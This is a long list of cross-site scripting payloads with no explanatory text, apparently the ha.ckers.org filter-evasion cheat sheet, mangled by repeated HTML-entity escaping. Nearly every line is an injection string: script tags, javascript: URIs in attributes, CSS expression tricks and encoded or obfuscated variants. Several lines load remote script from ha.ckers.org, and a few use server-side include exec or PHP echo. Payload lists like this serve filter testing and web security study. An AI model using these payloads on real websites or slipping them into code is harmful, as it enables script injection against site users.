&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
